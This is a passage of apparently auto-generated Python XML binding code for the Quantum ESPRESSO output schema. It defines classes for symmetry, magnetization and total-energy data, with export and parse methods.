outfile.write('<qes:paw>%s</qes:paw>%s' % (self.gds_format_boolean(self.paw, input_name='paw'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'real_space_q':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'real_space_q')
self.real_space_q = ival_
elif nodeName_ == 'uspp':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'uspp')
self.uspp = ival_
elif nodeName_ == 'paw':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'paw')
self.paw = ival_
# end class algorithmic_infoType
class symmetriesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nsym=None, nrot=None, space_group=None, symmetry=None):
self.original_tagname_ = None
self.nsym = nsym
self.nrot = nrot
self.space_group = space_group
if symmetry is None:
self.symmetry = []
else:
self.symmetry = symmetry
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, symmetriesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if symmetriesType.subclass:
return symmetriesType.subclass(*args_, **kwargs_)
else:
return symmetriesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nsym(self): return self.nsym
def set_nsym(self, nsym): self.nsym = nsym
def get_nrot(self): return self.nrot
def set_nrot(self, nrot): self.nrot = nrot
def get_space_group(self): return self.space_group
def set_space_group(self, space_group): self.space_group = space_group
def get_symmetry(self): return self.symmetry
def set_symmetry(self, symmetry): self.symmetry = symmetry
def add_symmetry(self, value): self.symmetry.append(value)
def insert_symmetry_at(self, index, value): self.symmetry.insert(index, value)
def replace_symmetry_at(self, index, value): self.symmetry[index] = value
def hasContent_(self):
if (
self.nsym is not None or
self.nrot is not None or
self.space_group is not None or
self.symmetry
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='symmetriesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('symmetriesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='symmetriesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='symmetriesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='symmetriesType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='symmetriesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.nsym is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nsym>%s</qes:nsym>%s' % (self.gds_format_integer(self.nsym, input_name='nsym'), eol_))
if self.nrot is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nrot>%s</qes:nrot>%s' % (self.gds_format_integer(self.nrot, input_name='nrot'), eol_))
if self.space_group is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:space_group>%s</qes:space_group>%s' % (self.gds_format_integer(self.space_group, input_name='space_group'), eol_))
for symmetry_ in self.symmetry:
symmetry_.export(outfile, level, namespaceprefix_, name_='symmetry', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'nsym' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'nsym')
self.nsym = ival_
elif nodeName_ == 'nrot' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'nrot')
self.nrot = ival_
elif nodeName_ == 'space_group' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'space_group')
self.space_group = ival_
elif nodeName_ == 'symmetry':
obj_ = symmetryType.factory()
obj_.build(child_)
self.symmetry.append(obj_)
obj_.original_tagname_ = 'symmetry'
# end class symmetriesType
class symmetryType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, info=None, rotation=None, fractional_translation=None, equivalent_atoms=None):
self.original_tagname_ = None
self.info = info
self.rotation = rotation
self.fractional_translation = fractional_translation
self.validate_d3vectorType(self.fractional_translation)
self.equivalent_atoms = equivalent_atoms
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, symmetryType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if symmetryType.subclass:
return symmetryType.subclass(*args_, **kwargs_)
else:
return symmetryType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_info(self): return self.info
def set_info(self, info): self.info = info
def get_rotation(self): return self.rotation
def set_rotation(self, rotation): self.rotation = rotation
def get_fractional_translation(self): return self.fractional_translation
def set_fractional_translation(self, fractional_translation): self.fractional_translation = fractional_translation
def get_equivalent_atoms(self): return self.equivalent_atoms
def set_equivalent_atoms(self, equivalent_atoms): self.equivalent_atoms = equivalent_atoms
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.info is not None or
self.rotation is not None or
self.fractional_translation is not None or
self.equivalent_atoms is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='symmetryType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('symmetryType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='symmetryType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='symmetryType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='symmetryType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='symmetryType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.info is not None:
self.info.export(outfile, level, namespaceprefix_, name_='info', pretty_print=pretty_print)
if self.rotation is not None:
self.rotation.export(outfile, level, namespaceprefix_, name_='rotation', pretty_print=pretty_print)
if self.fractional_translation is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fractional_translation>%s</qes:fractional_translation>%s' % (self.gds_format_double_list(self.fractional_translation, input_name='fractional_translation'), eol_))
if self.equivalent_atoms is not None:
self.equivalent_atoms.export(outfile, level, namespaceprefix_, name_='equivalent_atoms', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'info':
obj_ = infoType.factory()
obj_.build(child_)
self.info = obj_
obj_.original_tagname_ = 'info'
elif nodeName_ == 'rotation':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.rotation = obj_
obj_.original_tagname_ = 'rotation'
elif nodeName_ == 'fractional_translation':
fractional_translation_ = child_.text
fractional_translation_ = self.gds_validate_double_list(fractional_translation_, node, 'fractional_translation')
self.fractional_translation = fractional_translation_
# validate type d3vectorType
self.validate_d3vectorType(self.fractional_translation)
elif nodeName_ == 'equivalent_atoms':
obj_ = equivalent_atomsType.factory()
obj_.build(child_)
self.equivalent_atoms = obj_
obj_.original_tagname_ = 'equivalent_atoms'
# end class symmetryType
class infoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, name=None, class_=None, time_reversal=None, valueOf_=None):
self.original_tagname_ = None
self.name = _cast(None, name)
self.class_ = _cast(None, class_)
self.time_reversal = _cast(bool, time_reversal)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, infoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if infoType.subclass:
return infoType.subclass(*args_, **kwargs_)
else:
return infoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_class(self): return self.class_
def set_class(self, class_): self.class_ = class_
def get_time_reversal(self): return self.time_reversal
def set_time_reversal(self, time_reversal): self.time_reversal = time_reversal
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('infoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='infoType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='infoType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='infoType'):
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
if self.class_ is not None and 'class_' not in already_processed:
already_processed.add('class_')
outfile.write(' class=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.class_), input_name='class')), ))
if self.time_reversal is not None and 'time_reversal' not in already_processed:
already_processed.add('time_reversal')
outfile.write(' time_reversal="%s"' % self.gds_format_boolean(self.time_reversal, input_name='time_reversal'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='infoType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
value = find_attr_value_('class', node)
if value is not None and 'class' not in already_processed:
already_processed.add('class')
self.class_ = value
value = find_attr_value_('time_reversal', node)
if value is not None and 'time_reversal' not in already_processed:
already_processed.add('time_reversal')
if value in ('true', '1'):
self.time_reversal = True
elif value in ('false', '0'):
self.time_reversal = False
else:
raise_parse_error(node, 'Bad boolean attribute')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class infoType
class outputPBCType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, assume_isolated=None):
self.original_tagname_ = None
self.assume_isolated = assume_isolated
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, outputPBCType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if outputPBCType.subclass:
return outputPBCType.subclass(*args_, **kwargs_)
else:
return outputPBCType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_assume_isolated(self): return self.assume_isolated
def set_assume_isolated(self, assume_isolated): self.assume_isolated = assume_isolated
def hasContent_(self):
if (
self.assume_isolated is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='outputPBCType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('outputPBCType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='outputPBCType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='outputPBCType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='outputPBCType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='outputPBCType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.assume_isolated is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:assume_isolated>%s</qes:assume_isolated>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.assume_isolated), input_name='assume_isolated')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'assume_isolated':
assume_isolated_ = child_.text
assume_isolated_ = self.gds_validate_string(assume_isolated_, node, 'assume_isolated')
self.assume_isolated = assume_isolated_
# end class outputPBCType
class magnetizationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, lsda=None, noncolin=None, spinorbit=None, total=None, absolute=None, do_magnetization=None):
self.original_tagname_ = None
self.lsda = lsda
self.noncolin = noncolin
self.spinorbit = spinorbit
self.total = total
self.absolute = absolute
self.do_magnetization = do_magnetization
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, magnetizationType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if magnetizationType.subclass:
return magnetizationType.subclass(*args_, **kwargs_)
else:
return magnetizationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_lsda(self): return self.lsda
def set_lsda(self, lsda): self.lsda = lsda
def get_noncolin(self): return self.noncolin
def set_noncolin(self, noncolin): self.noncolin = noncolin
def get_spinorbit(self): return self.spinorbit
def set_spinorbit(self, spinorbit): self.spinorbit = spinorbit
def get_total(self): return self.total
def set_total(self, total): self.total = total
def get_absolute(self): return self.absolute
def set_absolute(self, absolute): self.absolute = absolute
def get_do_magnetization(self): return self.do_magnetization
def set_do_magnetization(self, do_magnetization): self.do_magnetization = do_magnetization
def hasContent_(self):
if (
self.lsda is not None or
self.noncolin is not None or
self.spinorbit is not None or
self.total is not None or
self.absolute is not None or
self.do_magnetization is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='magnetizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('magnetizationType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='magnetizationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='magnetizationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='magnetizationType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='magnetizationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.lsda is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:lsda>%s</qes:lsda>%s' % (self.gds_format_boolean(self.lsda, input_name='lsda'), eol_))
if self.noncolin is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:noncolin>%s</qes:noncolin>%s' % (self.gds_format_boolean(self.noncolin, input_name='noncolin'), eol_))
if self.spinorbit is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spinorbit>%s</qes:spinorbit>%s' % (self.gds_format_boolean(self.spinorbit, input_name='spinorbit'), eol_))
if self.total is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:total>%s</qes:total>%s' % (self.gds_format_double(self.total, input_name='total'), eol_))
if self.absolute is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:absolute>%s</qes:absolute>%s' % (self.gds_format_double(self.absolute, input_name='absolute'), eol_))
if self.do_magnetization is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:do_magnetization>%s</qes:do_magnetization>%s' % (self.gds_format_boolean(self.do_magnetization, input_name='do_magnetization'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'lsda':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'lsda')
self.lsda = ival_
elif nodeName_ == 'noncolin':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'noncolin')
self.noncolin = ival_
elif nodeName_ == 'spinorbit':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'spinorbit')
self.spinorbit = ival_
elif nodeName_ == 'total' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'total')
self.total = fval_
elif nodeName_ == 'absolute' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'absolute')
self.absolute = fval_
elif nodeName_ == 'do_magnetization':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'do_magnetization')
self.do_magnetization = ival_
# end class magnetizationType
class total_energyType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, etot=None, eband=None, ehart=None, vtxc=None, etxc=None, ewald=None, demet=None, efieldcorr=None, potentiostat_contr=None, gatefield_contr=None):
self.original_tagname_ = None
self.etot = etot
self.eband = eband
self.ehart = ehart
self.vtxc = vtxc
self.etxc = etxc
self.ewald = ewald
self.demet = demet
self.efieldcorr = efieldcorr
self.potentiostat_contr = potentiostat_contr
self.gatefield_contr = gatefield_contr
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, total_energyType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if total_energyType.subclass:
return total_energyType.subclass(*args_, **kwargs_)
else:
return total_energyType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_etot(self): return self.etot
def set_etot(self, etot): self.etot = etot
def get_eband(self): return self.eband
def set_eband(self, eband): self.eband = eband
def get_ehart(self): return self.ehart
def set_ehart(self, ehart): self.ehart = ehart
def get_vtxc(self): return self.vtxc
def set_vtxc(self, vtxc): self.vtxc = vtxc
def get_etxc(self): return self.etxc
def set_etxc(self, etxc): self.etxc = etxc
def get_ewald(self): return self.ewald
def set_ewald(self, ewald): self.ewald = ewald
def get_demet(self): return self.demet
def set_demet(self, demet): self.demet = demet
def get_efieldcorr(self): return self.efieldcorr
def set_efieldcorr(self, efieldcorr): self.efieldcorr = efieldcorr
def get_potentiostat_contr(self): return self.potentiostat_contr
def set_potentiostat_contr(self, potentiostat_contr): self.potentiostat_contr = potentiostat_contr
def get_gatefield_contr(self): return self.gatefield_contr
def set_gatefield_contr(self, gatefield_contr): self.gatefield_contr = gatefield_contr
def hasContent_(self):
if (
self.etot is not None or
self.eband is not None or
self.ehart is not None or
self.vtxc is not None or
self.etxc is not None or
self.ewald is not None or
self.demet is not None or
self.efieldcorr is not None or
self.potentiostat_contr is not None or
self.gatefield_contr is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='total_energyType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('total_energyType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='total_energyType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='total_energyType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='total_energyType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='total_energyType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.etot is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:etot>%s</qes:etot>%s' % (self.gds_format_double(self.etot, input_name='etot'), eol_))
if self.eband is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:eband>%s</qes:eband>%s' % (self.gds_format_double(self.eband, input_name='eband'), eol_))
if self.ehart is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ehart>%s</qes:ehart>%s' % (self.gds_format_double(self.ehart, input_name='ehart'), eol_))
if self.vtxc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:vtxc>%s</qes:vtxc>%s' % (self.gds_format_double(self.vtxc, input_name='vtxc'), eol_))
if self.etxc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:etxc>%s</qes:etxc>%s' % (self.gds_format_double(self.etxc, input_name='etxc'), eol_))
if self.ewald is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ewald>%s</qes:ewald>%s' % (self.gds_format_double(self.ewald, input_name='ewald'), eol_))
if self.demet is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:demet>%s</qes:demet>%s' % (self.gds_format_double(self.demet, input_name='demet'), eol_))
if self.efieldcorr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:efieldcorr>%s</qes:efieldcorr>%s' % (self.gds_format_double(self.efieldcorr, input_name='efieldcorr'), eol_))
if self.potentiostat_contr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:potentiostat_contr>%s</qes:potentiostat_contr>%s' % (self.gds_format_double(self.potentiostat_contr, input_name='potentiostat_contr'), eol_))
if self.gatefield_contr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gatefield_contr>%s</qes:gatefield_contr>%s' % (self.gds_format_double(self.gatefield_contr, input_name='gatefield_contr'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'etot' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'etot')
self.etot = fval_
elif nodeName_ == 'eband' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'eband')
self.eband = fval_
elif nodeName_ == 'ehart' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ehart')
self.ehart = fval_
elif nodeName_ == 'vtxc' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'vtxc')
self.vtxc = fval_
elif nodeName_ == 'etxc' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'etxc')
self.etxc = fval_
elif nodeName_ == 'ewald' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ewald')
self.ewald = fval_
elif nodeName_ == 'demet' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'demet')
self.demet = fval_
elif nodeName_ == 'efieldcorr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'efieldcorr')
self.efieldcorr = fval_
elif nodeName_ == 'potentiostat_contr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'potentiostat_contr')
self.potentiostat_contr = fval_
elif nodeName_ == 'gatefield_contr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'gatefield_contr')
self.gatefield_contr = fval_
# end class total_energyType
class band_structureType(GeneratedsSuper):
subclass = None
superclass = None
